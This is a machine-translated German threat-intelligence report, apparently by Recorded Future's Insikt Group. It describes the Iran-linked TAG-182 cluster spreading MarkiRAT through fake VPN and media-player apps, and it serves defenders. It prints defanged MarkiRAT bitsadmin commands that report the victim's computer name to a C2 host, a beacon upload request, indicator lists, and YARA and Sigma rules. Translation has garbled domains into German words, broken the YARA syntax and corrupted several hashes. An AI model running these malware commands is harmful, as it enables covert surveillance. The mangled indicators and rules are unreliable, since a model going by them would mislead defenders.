Iran-Nexus TAG-182 Disseminates MarkiRAT Surveillance Tool

Executive Summary

Die Insikt Group hat neue Infrastruktur identifiziert, die mit dem TAG-182-Bedrohungscluster verbunden ist und zur Verbreitung von MarkiRAT-Malware zur Unterstützung der iranischen Regierungsüberwachungsoperationen verwendet wird. Es ist sehr wahrscheinlich, dass TAG-182 Iraner im und außerhalb des Landes mit verschiedenen Ködern, darunter kostenlose Download-Tools und gefälschte VPN-Anwendungen, ins Visier nimmt. Die Aktivitäten der Gruppe sind höchstwahrscheinlich auf sozialen Medienplattformen wie Instagram aktiv.

Da der kinetische Konflikt mit den Vereinigten Staaten und Israel seit April 2026 nachgelassen hat, richtet Irans Sicherheitsapparat seinen Fokus wahrscheinlich auf verstärkte Cyberüberwachung und digitale Durchsetzungsoperationen, die sich gegen vermeintliche Dissidenten und mutmaßliche ausländische Kollaborateure richten. Die Aktivitäten von TAG-182 entsprechen diesen Sicherheitszielen und werden voraussichtlich auch nach der teilweisen Wiederherstellung des Internetzugangs im Iran am 26. Mai 2026 fortgesetzt. Die Indikatoren der Kompromiss (IoCs) für diesen Bericht sind in Anhang A einsehbar, während die Verteidigungssignaturen in Anhang C und Anhang D zu finden sind.

Wichtige Erkenntnisse

Bedrohungsanalyse

Anfang 2026 tauchten Open-Quellen-Informationen Malware-Proben auf, die mit MarkiRAT in Verbindung stehen, das historisch von Ferocious Kitten zur Überwachung von regierungsfeindlichen Netzwerken, Aktivisten und Menschenrechtsaktivisten im Iran genutzt wurde. Die IoCs, insbesondere die Köder, deuten darauf hin, dass Bedrohungsakteur eine Website individuell gebaut haben, die als Ausgangspunkt für eine Anwendung namens "YESHICA" dient (Tabelle 1). Weitere Beispielnamen sind auch "Pis2ray VPN", das weder in Google Play noch im Apple App Store eine legitime Anwendung ist (siehe Anhang A für weitere IoCs).

Im März 2026 identifizierte die Insikt Group eine neue Stichprobe, die mit der aktualisierten Infrastruktur von TAG-182 verbunden ist und einen fast identischen Medienplayer-Themenamen verwendet, "YESHICA YEPlayer" (Abbildung 1).

Abbildung 1: Beispiel, das die sich entwickelnde Namenstechnik von TAG-182 zeigt, bei der der Bedrohungsakteur seinen Namen der gefälschten Mediaplayer-App von 'YESHICA' auf 'YESHICA YEPlayer' aktualisierte, um weiterhin Nutzer anzusprechen.
Abbildung 1: TAG-182 setzte den Betrieb mit ähnlich benannten Anwendungen trotz der offenen Quellen-Ausstellung seiner Handwerks- und Infrastruktur (Quellen: Recorded Future) fort
SHA256-Hash
Dateiname
C2-Adresse
3b172281f65ceaee280ae810edb6fd39a1ecd25649f929f246c0405df94f4c89
YEPlayer.dll
212[.]83[.]61[.]198
66dcd98c6b310f4429890821e609d48cc6395a6be15ffe5a121ec68b7a8f7402
YEMPlayer.zip
212[.]83[.]61[.]198
51a6686b8c5ec7c610637398f3de43589f4e9fcbe8bcc0245343c5454d3b91de
YEMPlayer.msi
212[.]83[.]61[.]198
a4f1b79e96a7d016de1991a64506792018de99eac5df00f7cabe26ef41b2bd81
Pis2rayVPN.msi
212[.]83[.]61[.]198
400eb6a94810323a1fc5f8ab31c682fe765aaec2cc61b37c31d719c7e45c9a6c
Pis2rayVPN.zip
212[.]83[.]61[.]198
8a7f5c8533df9e51b2da7cc2aeb52d8787418e4915577cc9288be1e46d1945c6
Pis2rayN.dll
212[.]83[.]61[.]198

Tabelle 1: Malware-Proben, die mit der TAG-182-Bedrohungsaktivität (Quellen: Recorded Future, verbunden sind, Soziale Medien)

Diagramm der TAG-182-Angriffskette, das den Verlauf von den ersten Lockmitteln und gestuften Archiven bis zur Ausführung von MarkiRAT-Malware und dem endgültigen Überwachungszugriff zeigt.
Figur 2: TAG-182 leitet Ziele von gefälschten VPN- und Mediaplayer-Ködern durch gestufte Archive zur MarkiRAT-Dateiausführung, die mit Überwachungszugriffen endet (Quellen: Recorded Future)

Infrastrukturanalyse

Die Analyse der TAG-182-Infrastruktur zeigt einen bemerkenswerten Cluster von Domains, die auf einem einzigen Server gehostet werden (Tabelle 2), bekannt gegeben von der 23M GmbH (AS47447). Dies wird höchst unwahrscheinlich das gesamte Ausmaß der Infrastruktur der Gruppe abdecken, da zusätzliche von Angreifern kontrollierte Assets ebenfalls auf Servern gehostet werden, die von CrownCloud (AS199959) verwaltet werden (Tabelle 3). TAG-182 verwendet überwiegend Let's Encrypt-Zertifikate in seinen Domänen und zeigt die Einführung vielfältiger Namenskonventionen, darunter "microsoft" (und "microsotf"), "download", "vpn", "google" und soziale Medien Einheit Namen wie "facebook".

IP-Adresse
AS
Domain
Registrator
Zum ersten Mal gesehen
212[.]83[.]61[.]198
47447
yeplayer[.]Laden
Namebillig
2026-03-07
Yemplayer[.]Standort
Namebillig
2025-12-27
comi-site[.]website
Namebillig
2025-11-06
comesignt[.]Website
Namebillig
2025-08-18
comisignin[.]online
NameSilo, LLC
2025-06-02


Tabelle 2: Infrastruktur im Zusammenhang mit TAG-182-Bedrohungsaktivitäten (Quellen: Recorded Future)

IP-Adresse
AS
Domain
Registrator
Zum ersten Mal gesehen
46[.]30[.]191[.]105
199959
starvpn[.]pis2ray[.]online
Namebillig
2026-05-17
Komm zum Laden[.]Standort
Namebillig
2025-06-08
comx-view[.]store
Namebillig
2025-05-01

Tisch 3: Infrastruktur höchstwahrscheinlich von TAG-182 kontrolliert (Quellen: Recorded Future)

Ein Screenshot einer Website, 'starvpn.pis2ray.online', Sie geben sich als legitimer Star-Link-Dienst aus, um Nutzer dazu zu verleiten, eine gefälschte Anwendung herunterzuladen.
Figur 3: starvpn[.]pis2ray[.]Online Werbung für eine gefälschte Star Link-Anwendung am 17. Mai 2026 (Quelle: Recorded Future)
Konzeptkarte, die zeigt, wie drei Faktoren – TLS-Zertifikate, Domain-Namenskonventionen und Überschneidungen von MarkiRAT-Malware – TAG-182 als eigenständigen iranisch-nexus-Überwachungscluster identifizieren, der farsisprachige Nutzer anspricht
Figur 4: TLS-Zertifikate, Domain-Namenskonventionen und MarkiRAT-Malware-Überschneidungen verschmelzen und identifizieren TAG-182 als einen eigenständigen Iran-Nexus-Überwachungscluster, der auf persischsprachige Gemeinschaften abzielt (Quellen: Recorded Future)

MarkiRAT

Malware-Aktivitäten im Zusammenhang mit der MarkiRAT-Variante zeigen eine deutliche Überschneidung zwischen älteren und neueren Proben, wie beispielsweise durch die Background Intelligent Transfer Service (BITS)-Strings, die durch Malware Intelligence identifiziert wurden, belegt wird (Tabelle 4).

TAG-182 MarkiRAT Strings
Wildes Kätzchen-MarkiRAT-Strings
bitsadmin /cancel pdj
bitsadmin /create pdj
bitsadmin /resume pdj
bitsadmin /SetPriority pdj HIGH
bitsadmin /cancel pdj
bitsadmin /create pdj
bitsadmin /SetPriority pdj HIGH
bitsadmin /addfile pdj "hxxp[:]//microsotf[.]come-site[.]website/i.php?u=[computername]&i=proxy ip" %PUBLIC%AppData\Libs\p.b
bitsadmin /addfile pdj "hxxp[:]//[C2 address]/i.php?u=[computername]-[username]&i=[proxy ip]"
%PUBLIC%\AppData\Libs\p.b

Tabelle 4: Vergleich von BITS-Jobs-Strings in TAG-182 und Ferocious Kitten MarkiRAT-Beispielen (Quellen: Recorded Future, Securelist)

Der Erstzugriff beinhaltet eine GET Anfrage zur hxxps://vip[.]yeplayer[.]speichern/files/YEPlayer[.]RAR, das die Nutzlast weiterhin liefert, selbst wenn die Seite einen Fehler zeigt, was auf ein gezieltes Staging-Verhalten hinweist. Nach Extraktion und Ausführung von YEPlayer.exe, Die Malware startet eine POST Anfrage an microsotf[.]comi-site[.]Website, eine bekannte bösartige Domäne, die einen Multipart-/Formulardaten-Upload nach /up/uploadx.php (Abbildung 5) verwendet, der mit seiner Beaconing-Aktivität verbunden ist.

Anfrage
POST /up/uploadx.php?u=RVUNOOXW_Admin HTTP/1.1
Host: microsotf[.]comi-site[.]Website
Inhaltstyp: Multipart/Formulardaten; boundary="aeeec4a1-13e1-4167-8902-73438c364aa9"
Inhaltslänge: 115665

Antwort
HTTP/1.1 200 OK
Datum: Mi, 06. Mai 2026 23:32:40 GMT
Server: Apache
Upgrade: h2,h2c
Verbindung: Upgrade
variieren: Accept-Encoding
Transfer-Encoding: chunked
Inhaltstyp:  Text/HTML; charset=UTF-8

Abbildung 5: Beispiel für eine POST-Anfrage, die an microsotf gesendet wurde[.]comi-site[.]Website (Quellen: Recorded Future)

Eine weitere bemerkenswerte Überschneidung mit der Originalversion von MarkiRAT ist die Erkennung eines "svehost.exe” (imitiert svchost.exe) Datei, die erwartet, dass sie im Pfad AppData\Windows installiert wird. Wenn installiert, wird das Attribut versteckte Datei aus C:\Users\Public\AppData\Windows\svehost.exe der Verwendung attrib -hentfernt, wodurch die Datei sichtbar und leichter handhabbar ist.

Die Malware führt taskkill /im svehost.exe /t /fdann aus, was jeden laufenden Prozess, der benannt svehost.exe ist, und alle von ihr erzeugten Kindprozesse zwangsweise beendet. Die Sequenz ist wahrscheinlich darauf ausgelegt, die ausführbare Datei freizulegen und ihre laufende Instanz zu stoppen, damit MarkiRAT oder ein Betreiber sie ersetzen, aktualisieren, löschen oder neu starten kann.

Zielerfassung von persischsprachigen Nutzern

Open-Quellen-Informationen deuten darauf hin, dass TAG-182 weiterhin den Fokus darauf gelegt hat, persischsprachige Nutzer zum Download seiner gefälschten Anwendungen zu locken. So wurden beispielsweise in den Wochen nach den Straßenprotesten, die gegen Ende 2025 ausbrachen, auf Instagram Social-Media-Threads (einige wurden gelöscht) mit Ködern für Farsi-Sprecher identifiziert. Abbildung 6 zeigt einen Beitrag in sozialen Medien , der die Einführung von Pis2ray VPN bewirbt und die Aktivitäten der mutmaßlichen Administratoren hervorhebt, die Dienste kurz nach dem Ende des "internationalen Internets" (1, 2, 3) im Iran aktivierten. Die Gruppe verwendet spezifische Formulierungen und Begriffe, die sich als Plattform für interessierte regierungskritische Parteien tarnen.

Ein Screenshot eines Instagram-Posts, der die Pis2ray-VPN-Anwendung bewirbt, die von Bedrohungsakteur als Lockmittel genutzt wird, um Malware an farsisprachige Nutzer zu verbreiten
Abbildung 6: Bedrohungsakteur identifizierte die Verbreitung der Staging-Website für Pis2Ray VPN (Quellen: Instagram)

Zuschreibung

Zum Zeitpunkt der Analyse ist die Verwendung von MarkiRAT mit Ferocious Kitten assoziiert. Dies schließt jedoch nicht aus, dass andere Bedrohungsgruppen im Iran dieselbe Malware sowie aktualisierte Varianten verwenden können. Es ist nahezu sicher, dass sich die Mehrheit der Ziele im Iran befindet oder mit iranischen regierungskritischen Bewegungen in Europa oder Nordamerika verbunden ist.

Da TAG-182 eindeutig mit MarkiRAT identifiziert wurde und fast sicher Iraner ins Visier nimmt, und da es ähnliche Infrastruktur-Tradecraft wie Ferocious Kitten nutzt, ist es zunehmend wahrscheinlich, dass die Gruppen miteinander verwandt sind. Während die Insikt Group die Malware von TAG-182 keiner bestimmten iranischen Sicherheitsorganisation zuordnen kann, ist TAG-182 fast sicher mit dem breiteren Bedrohungscluster pro-iranischer Cyberüberwachungsgruppen verbunden, die iranische Zivilisten und regierungskritische Netzwerke innerhalb und außerhalb des Irans ins Visier nehmen. Zu diesen Gruppen gehören GreenEcho (Domestic Kitten), Ferocious Kitten und Rampant Kitten, die alle wahrscheinlich eine Rolle bei der Unterstützung der digitalen Überwachung der Regierung spielen Kampagne

Jede Gruppe wird separat verfolgt und nutzt einzigartige Tradecrafts, spezifische Malware (MarkiRAT, FurBall, DCHSpy und BouldSpy) sowie Infrastruktur und ist fast ausschließlich der Unterstützung der iranischen Regierung und verbundenen Organisationen gewidmet. Dazu gehören das Islamische Revolutionsgardekorps (IRGC) und seine paramilitärische Hilfstruppe Basij sowie die iranische Cyberpolizei (FATA), die die iranische Straßen unterdrücken und durchsetzen.

Ausblick

Mit Blick auf die Zukunft, sofern nicht zu aktiven Konfliktbedingungen zurückkehrt, wird die iranische Regierung voraussichtlich durchsetzungsfähigere interne Sicherheitsmaßnahmen ergreifen, während sie gleichzeitig ihre diplomatische Haltung gegenüber den USA navigiert. Iranische Cyberüberwachungsteams sind Berichten zufolge während des Krieges aktiv geblieben, identifizierten Netzwerke von regierungskritischen Demonstranten und, wie in offenen Quellen berichtet, mutmaßliche ausländische Kollaborateure. Laut der Menschenrechtsorganisation Amnesty International nutzten die iranischen Behörden die Kriegsbedingungen, um ihre digitale Kontrolle während einer 88-tägigen Internetabschaltung zu festigen. Die Regierung soll Berichten zufolge "zwangsweise [Text]botschaften" gesendet haben, die "gewöhnliche Online-Aktivitäten als Frage der nationalen Sicherheit" darstellen und "diejenigen, die über VPNs oder Satellitenverbindungen auf das globale Internet zugreifen, mit Festnahmen, Strafverfolgung, Beschlagnahmung von Vermögenswerten und anderen Strafen nach dem Spionagegesetz drohen."

Mit der teilweisen Wiederherstellung des Internetzugangs am 26. Mai 2026 beleben Irans vielschichtige Cyberüberwachungsinstitutionen sehr wahrscheinlich digitale Überwachungsmaßnahmen, um regierungsfeindliche Stimmungen zu überwachen und eine schnelle Durchsetzung gegen Dissidenten zu ermöglichen. Die Internetwiederherstellung, die durch die Einrichtung einer präsidialen Sonderarbeitsgruppe umgesetzt wurde, die für die Beendigung des Stillstands stimmte, wurde von harten Elementen des Obersten Nationalen Sicherheitsrats (SNSC) und des Obersten Rates für Cyberspace (SCC), zwei der einflussreichsten politischen Gremien Irans für Sicherheit und Internetverwaltung, stark abgelehnt.

Angesichts des Streits über die Wiederherstellung des Internetzugangs unterstützen SNSC- und SCC-Hardliner wahrscheinlich die Aktivierung des iranischen inländischen Cyberüberwachungsapparats, der aus der IRGC, dem Basij Cyber Council, der FATA und dem Ministerium für Nachrichtendienste und Sicherheit (MOIS) besteht . Jede Organisation hat ihr eigenes Mandat innerhalb des digitalen Überwachungsökosystems der Regierung, von denen einige sich überschneiden und sogar konkurrieren, aber alle werden wahrscheinlich eine Rolle für die interne Stabilität nach Konflikten spielen, da Teheran sowohl seine physische Infrastruktur als auch seine innenpolitische Machtstruktur wiederaufbauen will. Das Malware-Schema von TAG-182 ist wahrscheinlich eines der zahlreichen Taktiken-, TTPs-, TTPs (TTPs), die von diesen Organisationen eingesetzt werden, um sicherzustellen, dass jegliche Gegner sowohl online als auch auf der Straße entdeckt werden.

Anhang A: Indikatoren für Kompromittierungen

Domains:
accountes[.]google[.]comesignt[.]website
​​accounts[.]google[.]comisignin[.]online
admin[.]google[.]com-accounts[.]website
admin[.]instagram[.]com-accounts[.]website
c[.]pis2ray[.]online
com-accounts[.]website
come-signin[.]quest
comesignt[.]website
comestore[.]site
comisignin[.]online
comx-view[.]store
download[.]yeplayer[.]store
google[.]com-accounts[.]website
google[.]com-signin[.]site
google[.]comisignin[.]online
host[.]comview[.]website
microsoft[.]pis2ray[.]online
microsoft[.]comesite[.]website
microsoft[.]come-site[.]website
microsoft[.]comi-site[.]website
microsoft[.]comview[.]website
microsotf[.]comi-site[.]website
miga[.]comesignt[.]website
migavpn[.]store
min[.]come-site[.]website
min[.]comi-site[.]website
min[.]comview[.]website
min[.]pis2ray[.]online
ns1[.]com-signin[.]site
ns2[.]com-signin[.]site
orbitx[.]site
pis2ray[.]online
prx[.]pis2ray[.]online
sahar2ray[.]online
starvpn[.]pis2ray[.]online
svpn[.]pis2ray[.]online
tools[.]sahar2ray[.]online
vip[.]yeplayer[.]store
vpn[.]pis2ray[.]online
webmail[.]com-accounts[.]website
webmail[.]facebook[.]com-accounts[.]website
webmail[.]google[.]com-accounts[.]website
webmail[.]instagram[.]com-accounts[.]website
www[.]facebook[.]com-accounts[.]website
www[.]google[.]com-accounts[.]website
www[.]instagram[.]com-accounts[.]website
www[.]pis2ray[.]online
www[.]yeplayer[.]store
www[.]yemplayer[.]site
yeplayer[.]store
yemplayer[.]site

IP Addresses:
45[.]86[.]162[.]197
46[.]30[.]191[.]105
46[.]30[.]191[.]123
89[.]144[.]145[.]237
89[.]144[.]145[.]239
212[.]83[.]61[.]198

SHA256 Hash:
13440348516ccee839675f6ac908dd1724ce1d28f92af92fdc7938740d2b7ec5
400eb6a94810323a1fc5f8ab31c682fe765aaec2cc61b37c31d719c7e45c9a6c
51a6686b8c5ec7c610637398f3de43589f4e9fcbe8bcc0245343c5454d3b91de
66dcd98c6b310f4429890821e609d48cc6395a6be15ffe5a121ec68b7a8f7402
6c74d29903bc2cc17ec4afdb1a120d2060209b22830cee2b7005f5436e86f90e
8a7f5c8533df9e51b2da7cc2aeb52d8787418e4915577cc9288be1e46d1945c6
a4f1b79e96a7d016de1991a64506792018de99eac5df00f7cabe26ef41b2bd81
bb0c7ae4f12e5141480ee26f473636b07e836bb994ff3b2cfec93d4480da171b
cc59bf019af195dcec4394ffd7a8e23c080f4e02b12dcb7c04fb1da6671922a1
ea755862ee81dd0d991b4afca42d8b82bb22a8f1d370bf3d28dbf2e44ab241dd
ea755862ee81dd0d991b4afca42d8b82bb22a8f1d370bf3d28dbf2e44ab241dd
fa246327bed8fc5864827a8147b8b7aedb6246068259b8c97e82adb957315347

Appendix B: MITRE ATT&CK Techniques

Taktik: Technik
ATT&CK-Code
Ressourcenentwicklung: Infrastruktur erwerben: Domänen
T1583.001
Erstzugriff: Phishing: Spearphishing-Anhang
T1566.001
Erstzugriff: Phishing: Spearphishing-Link
T1566.002
Ausführung: Benutzerausführung: Bösartige Datei
T1204.002
Hinrichtung: BITS-Jobs
T1197

Anhang C: YARA-Regel

Regel APT_IR_TAG182_MarkiRAT_2
{
    meta:
        Autor = "Insikt Group, Recorded Future"
        Datum = "2026-04-07"
        Beschreibung = "Verfolgen Sie die Haupthintertür von TAG-182, MarkiRAT"
        Version = "1.0"
        Referenz = "https://x.com/ClearskySec/status/2016067892589023349"
        hash = "13440348516ccee839675f6ac908DD1724ce1d28f92af92fdc7938740d2b7ec5"
        hash = "bb0c7ae4f12e5141480ee26f473636b07e836bb994ff3b2cfec93d4480da171b"
        hash = "fa246327bed8fc5864827a8147b8b7aedb62444b6244 6068259b8c97e82adb957315347"
        hash = "3b172281f65ceaee280ae810edb6fd39a1ecd25649f929f246c05df944f4c89"
        hash = "f7bde19f9e085650378076dabac586dcdc256e743a578900000e71a71a7ebb43d8ee"
        malware = "MarkiRAT"
        malware_id = "iRjG1u"
        Actor = "TAG-182"
        actor_id = "BKMf7Fc"
        Kategorie = "MALWARE"
    Zeichenketten:
        $url 1 = "/i.php?u=" ascii wide
        $url 2 = "/uploadx.php?u=" ascii wide
        $scr 1 = "CaptureAndSendScreenshotAsync" ascii wide
        $scr 2 = "\\scr.jpg" ascii wide
        $dir = "C:\\Users\\Public" ascii wide
    Bedingung:
        uint16(0) == 0x5a4d
        und jede von ($url*)
        und jede von ($scr*)
        und $dir
}

Anhang D: SIGMA-Regel

Titel: MarkiRAT Malware Bitsadmin Datei Download
id: c7f01654-afdf-4fce-96f8-6c0a405370c2
Status: stabil
Beschreibung: Erkennt die Verwendung von bitsadmin zum Herunterladen einer Datei von einer entfernten URL durch MarkiRAT-Malware, die von Iran-Nexus TAG-182 verwendet wird.
Quellen:
- https://tria.ge/250622-fcp2eaak8t
Autor: Insikt Group, Recorded Future
Datum: 07.05.2026
Tags:
    - attack.t1197 # BITS Jobs
    - attack.t1059.003 # Command and Scripting Interpreter: Windows Command Shell
logsource:
  Produkt: Windows
  Kategorie: process_creation
Erkennung:
  bitsadmin_download:
    CommandLine|enthält|alle: 
    - 'bitsadmin'
    - '/addfile'
  markirat_urls:
    CommandLine|enthält:
    - '/i.php?u='
    - '/uploadx.php?u='
  Bedingung: bitsadmin_download und markirat_urls
Niveau: hoch
Falsepositives:
- Unwahrscheinlich